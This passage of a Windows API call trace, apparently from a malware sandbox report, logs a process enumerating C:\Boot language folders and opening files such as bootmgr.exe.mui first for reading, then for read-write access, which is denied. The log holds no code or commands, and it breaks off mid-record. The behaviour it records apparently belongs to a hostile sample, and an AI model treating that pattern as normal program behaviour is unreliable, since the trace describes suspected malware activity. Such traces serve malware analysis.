RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x464a8 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0083.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.526] AreFileApisANSI () returned 1 [0083.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.526] AreFileApisANSI () returned 1 [0083.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0083.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30 [0083.527] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.527] GetFileType (hFile=0x42c) returned 0x1 [0083.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0083.527] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.527] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.527] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.527] CloseHandle (hObject=0x42c) returned 1 [0083.528] AreFileApisANSI () returned 1 [0083.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30 [0083.528] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.528] GetLastError () returned 0x5 [0083.528] GetLastError () returned 0x5 [0083.528] SetLastError (dwErrCode=0x5) [0083.528] GetLastError () returned 0x5 [0083.528] SetLastError (dwErrCode=0x5) [0083.528] GetLastError () returned 0x5 [0083.528] SetLastError (dwErrCode=0x5) [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.528] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.528] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0083.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0083.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0083.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.529] AreFileApisANSI () returned 1 [0083.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hu-HU\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hu-HU\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0083.529] AreFileApisANSI () returned 1 [0083.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0083.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 30 [0083.530] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0083.530] GetFileType (hFile=0x42c) returned 0x1 [0083.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0083.530] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0083.530] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0083.530] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0083.530] CloseHandle (hObject=0x42c) returned 1 [0083.530] AreFileApisANSI () returned 1 [0083.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0083.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0083.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 30 [0083.531] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.531] GetLastError () returned 0x5 [0083.531] GetLastError () returned 0x5 [0083.531] SetLastError (dwErrCode=0x5) [0083.531] GetLastError () returned 0x5 [0083.531] SetLastError (dwErrCode=0x5) [0083.531] GetLastError () returned 0x5 [0083.531] SetLastError (dwErrCode=0x5) [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0083.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.531] FindNextFileW (in: hFindFile=0x78350, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧뎘")) returned 0 [0083.531] FindClose (in: hFindFile=0x78350 | out: hFindFile=0x78350) returned 1 [0083.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0083.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.532] AreFileApisANSI () returned 1 [0083.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\it-IT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\it-IT", lpUsedDefaultChar=0x0) returned 14 [0083.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.532] AreFileApisANSI () returned 1 [0083.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88798 [0083.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88798, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\it-IT") returned 14 [0083.532] CreateFileW (lpFileName="C:\\Boot\\it-IT" (normalized: "c:\\boot\\it-it"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.532] GetLastError () returned 0x5 [0083.533] GetLastError () returned 0x5 [0083.533] SetLastError (dwErrCode=0x5) [0083.533] GetLastError () returned 0x5 [0083.533] SetLastError (dwErrCode=0x5) [0083.533] GetLastError () returned 0x5 [0083.533] SetLastError (dwErrCode=0x5) [0083.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.533] AreFileApisANSI () returned 1 [0083.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0083.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0083.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\it-IT") returned 14 [0083.533] CreateFileW (lpFileName="C:\\Boot\\it-IT" (normalized: "c:\\boot\\it-it"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.533] GetLastError () returned 0x5 [0083.533] GetLastError () returned 0x5 [0083.533] SetLastError (dwErrCode=0x5) [0083.533] GetLastError () returned 0x5 [0083.533] SetLastError (dwErrCode=0x5) [0083.533] GetLastError () returned 0x5 [0083.533] SetLastError (dwErrCode=0x5) [0083.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0083.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0083.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.534] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.534] FindFirstFileExW (in: lpFileName="C:\\Boot\\it-IT\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78110 [0083.534] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, 